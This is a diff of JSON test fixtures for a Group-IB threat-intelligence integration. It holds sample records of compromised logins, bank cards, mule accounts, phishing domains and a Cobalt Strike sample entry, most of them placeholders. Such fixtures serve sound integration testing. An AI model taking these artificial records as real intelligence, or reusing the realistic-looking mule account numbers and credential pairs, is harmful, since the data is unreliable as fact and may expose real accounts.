}, - "cnc": { - "cnc": "some.ru", - "domain": "some.ru", - "ipv4": { - "asn": null, - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "Cloudflare", - "region": "California" - }, - "ipv6": null, - "url": null - }, - "dateCompromised": "2019-12-12T10:41:00+00:00", - "dateDetected": "2019-12-12T10:57:49+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "red", - "ttl": 90 - }, - "externalId": "12312", - "id": "ecda6f4dc85596f447314ce01e2152db9c9d3cbc", - "isFavourite": false, - "isHidden": false, - "malware": {"id": "53013c863116aae720581ff2aa2b4f92d3cb2bd7", "name": "mandarincc"}, - "oldId": "396798216", - "owner": { - "address": null, - "birthday": null, - "city": "Something", - "countryCode": "US", - "email": null, - "name": "Name", - "passport": null, - "phone": "932876", - "state": "Ohio", - "taxNumber": null, - "zip": null - }, - "portalLink": "https://bt.group-ib.com/cd/cards?searchValue=id:ecda6f4dc85596f447314ce01e2152db9c9d3cbc", - "price": {"currency": "USD", "value": "13213"}, - "seqUpdate": 1614923910464, - "serviceCode": null, - "sourceType": "Card shop", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "track": [] - } - ], - 1614923910464 - ], - "bp/phishing": [ - [ - { - "dateBlocked": null, - "dateDetected": "2021-01-14T11:21:34+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "history": [ - { - "date": "2021-01-13T11:20:50+00:00", - "field": "Detected", - "reason": "In response", - "reporter": "Group-IB Intelligence", - "value": "In response" - }, - { - "date": "2021-01-14T11:20:50+00:00", - "field": "Status has been changed", - "reason": "-", - "reporter": "Group-IB Intelligence", - "value": "In response" - } - ], - "id": "fce7f92d0b64946cf890842d083953649b259952", - "ipv4": { - "asn": null, - "city": "Some city", - "countryCode": "CA", - "countryName": "Canada", - "ip": "11.11.11.11", - "provider": "Some provider", - "region": "NA" - }, - "isFavourite": false, - "isHidden": false, - "oldId": "396798526", - "phishingDomain": { - "domain": "some.ru", - "local": "some.ru", - "dateRegistered": "2013-11-15 13:41:30", - "title": "", - "registrar": "Some" - }, - "portalLink": "https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952", - "seqUpdate": 1614925293641, - "status": "In response", - "targetBrand": "Some brand", - "targetCategory": "Finance > Banking", - "targetCountryName": null, - "targetDomain": "some.ru", - "type": "Phishing", - "url": "https://some.ru" - } - ], - 1614925293641 - ], - "bp/phishing_kit": [ - [ - { - "dateDetected": "2021-01-14T12:10:41+00:00", - "dateFirstSeen": "2021-01-14T13:10:41+00:00", - "dateLastSeen": "2021-01-14T14:12:17+00:00", - "downloadedFrom": [ - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - } - ], - "emails": [], - "evaluation": { - "admiraltyCode": "B2", - "credibility": 70, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", - "id": "044f3f2cb599228c1882884eb77eb073f68a25f2", - "isFavourite": false, - "isHidden": false, - "oldId": "396793696", - "path": "https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit/044f3f2cb599228c1882884eb77eb073f68a25f2/file/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", - "portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=id:044f3f2cb599228c1882884eb77eb073f68a25f2", - "seqUpdate": 1614921031175, - "targetBrand": [], - "tsFirstSeen": null, - "tsLastSeen": null, - "variables": null - } - ], - 1614921031175 - ], - "osi/git_repository": [ - [ - { - "company": [], - "companyId": [ - 3150 - ], - "contributors": [ - { - "authorEmail": "some@email.com", - "authorName": "somename" - }, - { - "authorEmail": "some@email.com", - "authorName": "somename" - }, - { - "authorEmail": "some@email.com", - "authorName": "somename" - } - ], - "dataFound": { - "password": 8, - "apikey": 2, - "secret": 1 - }, - "dateCreated": "2021-01-23T22:12:58+03:00", - "dateDetected": "2021-01-28T22:32:54+03:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 50, - "reliability": 50, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "favouriteForCompanies": [], - "files": [ - { - "dataFound": [], - "dateCreated": "1970-01-01T03:00:00+03:00", - "dateDetected": "2021-01-28T19:37:08+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 30, - "reliability": 100, - "severity": "gray", - "tlp": "amber", - "ttl": 30 - }, - "id": "1111111111111111111111111111111111111111", - "matchesType": [ - "readme" - ], - "matchesTypeCount": { - "readme": 1 - }, - "name": "example.txt", - "revisions": [ - { - "bind": [ - { - "bindBy": "", - "companyId": 0, - "data": "", - "ruleId": 0, - "type": "readme" - } - ], - "data": null, - "hash": "1111111111111111111111111111111111111111", - "info": { - "authorEmail": "some@email.com", - "authorName": "TEST", - "timestamp": 1611429178 - } - } - ], - "rules": null, - "url": "https://github.com/somegit" - } - ], - "hideForCompanies": [], - "id": "1111111111111111111111111111111111111111", - "ignoreForCompanies": [], - "isFavourite": false, - "isHidden": false, - "isIgnore": false, - "matchesTypes": [], - "name": "https://github.com/somegit", - "numberOf": { - "contributors": 3, - "files": 10 - }, - "relations": { - "infobip.com": "some.com", - "Infobip": "some" - }, - "seqUpdate": 1611862631144674, - "source": "github" - } - ], - 1611862631144674 - ], - "osi/public_leak": [ - [ - { - "bind": [], - "created": "2020-10-05T17:51:31+03:00", - "data": "Pasted at: 05/10/2020 15:45", - "displayOptions": null, - "evaluation": { - "admiraltyCode": "C3", - "credibility": 50, - "reliability": 50, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", - "id": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", - "language": "c", - "linkList": [ - { - "author": "whaaaaaat", - "dateDetected": "2020-10-05T17:51:31+03:00", - "datePublished": "2020-10-05T17:45:46+03:00", - "hash": "3066db9f57b7997607208fedc45d7203029d9cb3", - "itemSource": "api", - "link": "https://some.ru", - "sequenceUpdate": null, - "size": 345, - "source": "some.ru", - "status": 1, - "title": "Hashed Email With Exclude" - } - ], - "matches": { - "email": { - "email": [ - "some@gmail.ru" - ] - } - }, - "oldId": null, - "portalLink": "https://bt.group-ib.com/osi/public_leak?searchValue=id:a9a5b5cb9b971a2a037e3a0a30654186ea248094", - "seqUpdate": 1601909532153438, - "size": "345 B", - "updated": "2020-10-05T17:51:31+03:00", - "useful": 1 - } - ], - 1601909532153438 - ], - "malware/targeted_malware": [ - [ - { - "date": "2021-01-21T06:49:12+00:00", - "dateAnalyzeEnded": "2021-01-21T09:53:23+00:00", - "dateAnalyzeStarted": "2021-01-21T09:49:12+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": null - }, - "fileName": "some.txt", - "fileType": "data", - "fileVersion": null, - "hasReport": true, - "id": "5bbd38acf0b9e4f04123af494d485f6c49221e98", - "injectDump": "saasadasdd", - "injectMd5": "971cca2a0f04ced4crb8218624d88de2", - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "b69fc9d439d2fd41e98a7e3c60b9a55340012eb6", - "name": "Cobalt Strike" - }, - "md5": "11702f92313f5f5123d129809ca4f83d", - "oldId": "396793259", - "portalLink": "https://bt.group-ib.com/targeted_malware/Cobalt Strike/sample/5bbd38acf0b9e4f04123af494d485f6c49221e98/show", - "seqUpdate": 1614920439682, - "sha1": "93fce6228be5557c69d8eeaab5a5a2a643e7d450", - "sha256": "630c88ca1d583f05283707730da5b1f4423807cd80cab108821157ad341b5003", - "size": 208178, - "source": "Sandbox service", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - } - } - ], - 1614920439682 - ], - "compromised/breached": [ - [ - { - "addInfo": { - "address": [ - "" - ] - }, - "email": [ - "some@gmail.com" - ], - "id": [ - "277c4112d348c91f6dabe9467f0d11dd" - ], - "leakName": "some.com", - "password": [ - "CD91C480FDE9D7ACB8AC4B78310EA2ED", - "1390DDDFA28AE085D23518A035707231" - ], - "updateTime": "2021-06-12T03:02:00", - "uploadTime": "2021-06-12T03:02:00" - } - ], - { - "starting_date_from": "2020-01-01", - "page": 0, - "starting_date_to": "2021-01-01", - "current_date_to": "2021-01-01" - } - ], - "bp/domain": [ - [ - { - "id": 14940404, - "ts_create": "2016-07-19 20:04:01", - "ts_update": "2021-01-01 00:35:46", - "attrs": { - "domain": "some.ru", - "date_registered": null, - "date_expired": null, - "tld": "de", - "detection_rate": "0/68", - "name_server": [ - "Server" - ], - "person": "Person", - "address": "Address", - "phone": "Phone", - "organization": null, - "registrar": null, - "page_title": "Title", - "email": "some@gmail.com", - "favicon_md5": "38f5f976255a663bced929bb3c252880", - "status": "Status", - "type": "Type", - "server_ip": "11.11.11.11", - "server_ip_asn": "ASN", - "server_ip_city": "City", - "server_ip_country_code": "Code", - "server_ip_country_name": "Country", - "server_ip_provider": "Provider", - "server_ip_region": "Region", - "ip_history": [], - "keywords": [ - "keywords" - ], - "history": [], - "screenshot": "https://bt.group-ib.com/?module=brand_domain_screenshot&action=data&id=14940404", - "html": "https://bt.group-ib.com/?module=brand_domain_html&action=download&id=14940404", - "favicon": "https://bt.group-ib.com/?module=brand_domain_favicon&action=data&id=14940404" - } - } - ], - 3684188313 - ] -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json new file mode 100644 index 000000000000..bf873181fd1b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json @@ -0,0 +1,11155 @@ +{ + "compromised/account_group":{ + "count": 630118817, + "items": [ + { + "id": "96339c2618783a2ffd3fe3f0e855bc63b4890688", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "examplelogin", + "password": "123456789", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "63b797f8b9924391d6669f55b80bbb43f1a7f285", + "oldId": "6285", + "stixGuid": "1db49a6a-4844-4d80-d2a6-e990a14bcba2", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347005000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "62ecbec64a7c69bebb8894fcef3ac848e74080b1", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "loginexample", + "password": "password123", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "26ae9e9017a7ccd6be71640a55976b3e1172c492", + "oldId": "6291", + "stixGuid": "f57e7a34-91a6-567f-fbab-d204cf9e132b", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347013000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "ba987664a068419d7e6e9ea8988df0e7b38b2f14", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "12345", + "password": "12345", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "eabc301dc60356c65ac7256ee1ba528f8422cd33", + "oldId": "6300", + "stixGuid": "3bfaab11-e4f9-49a9-faf8-eb1f029b39a3", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": "192.168.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347019000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + } + ], + "settings": { + "search": { + "tags": [ + "hr_cnc_country", + "hr_victim_country", + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "threat_actor", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "options", + "few_events", + "ip", + "domain", + "domain.tree", + "id", + "os_family", + "os_details", + "antivirus_software", + "os_architecture", + "system_locale", + "stealer_build", + "probable_corporate_access", + "notification_id" + ], + "fields": [ + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "threat_actor", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "event_count", + "id", + "login", + "email", + "ip", + "domain", + "domain.tree", + "dateFirstCompromised", + "dateLastCompromised", + "host_hwid", + "host_domain", + "host_domain.tree", + "host_pcname", + "host_malware_path" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1450014347019000 + }, + "compromised/bank_card_group":{ + "count": 534786, + "items": [ + { + "id": "1a07ffa146409f1ed51675155b54b81a4257a742", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111111", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "240", + "pin": null, + "validThruDate": "2021-09-30", + "validThru": "09/2021" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570125", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147825395, + "stixGuid": "8bd1a0ae-2191-d411-c025-332e37e115ba", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "f4d32fd739748e75d48a3f397536356e0031a1c3", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111110", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "409", + "pin": null, + "validThruDate": "2022-07-31", + "validThru": "07/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570179", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147827461, + "stixGuid": "22a20ce1-72ba-082b-16c3-c2465c613782", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "5b53acb50d9954d5a8f8455400747931568c8ead", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111112", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "989", + "pin": null, + "validThruDate": "2022-09-30", + "validThru": "09/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570208", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147828497, + "stixGuid": "49607d22-648a-39ae-485f-db32b2e3ac96", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + } + ], + "settings": { + "search": { + "tags": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "bin", + "severity", + "options", + "has_zip", + "hasnt_filled_zip", + "threat_actor", + "seqUpdate", + "few_events", + "ip", + "domain", + "domain.tree", + "notification_id", + "id" + ], + "fields": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "cybercrime", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "threat_actor", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "bin", + "cardInfo.number", + "severity", + "seqUpdate", + "event_count", + "id", + "ip", + "domain", + "domain.tree", + "date_first_compromised", + "date_last_compromised", + "dateFirstCompromised", + "dateLastCompromised" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1673147828497 + }, + "compromised/mule":{ + "count": 35251, + "items": [ + { + "id": "5eb9ccb5081203e82ac1159e44747a6af4bb7391", + "account": "4351391043922426", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-08-07T16:00:40+00:00", + "dateIncident": "2015-07-23T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "2a006b1d3bc002c4fb133d6b74bd2f09", + "info": null, + "malware": null, + "oldId": "44453", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699132268, + "sourceType": null, + "stixGuid": "daae3751-e9d1-210d-cf53-cbb5e76bbaa4", + "threatActor": null, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "7db6ee3515cc1a019b057a32210e1d95090dac88", + "account": "4351391043368307", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:34:03+00:00", + "dateIncident": "2015-07-05T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "e193977ea8efc516319904b340a5901d", + "info": null, + "malware": null, + "oldId": "23398", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133282, + "sourceType": null, + "stixGuid": "d1ce6a9a-76c5-fbba-a5db-9b72ac2a97c7", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "92c0c55c48b22e70e4118535dc0a7b63134ec4ad", + "account": "4351391043068758", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:33:41+00:00", + "dateIncident": "2015-07-09T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "69ec671f1666120040d907fdd0cd577f", + "info": null, + "malware": null, + "oldId": "22984", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133295, + "sourceType": null, + "stixGuid": "50bc844f-25fe-17ef-b5f3-dc170684e718", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "id", + "type", + "operator", + "threat_actor", + "malware", + "source", + "severity", + "options", + 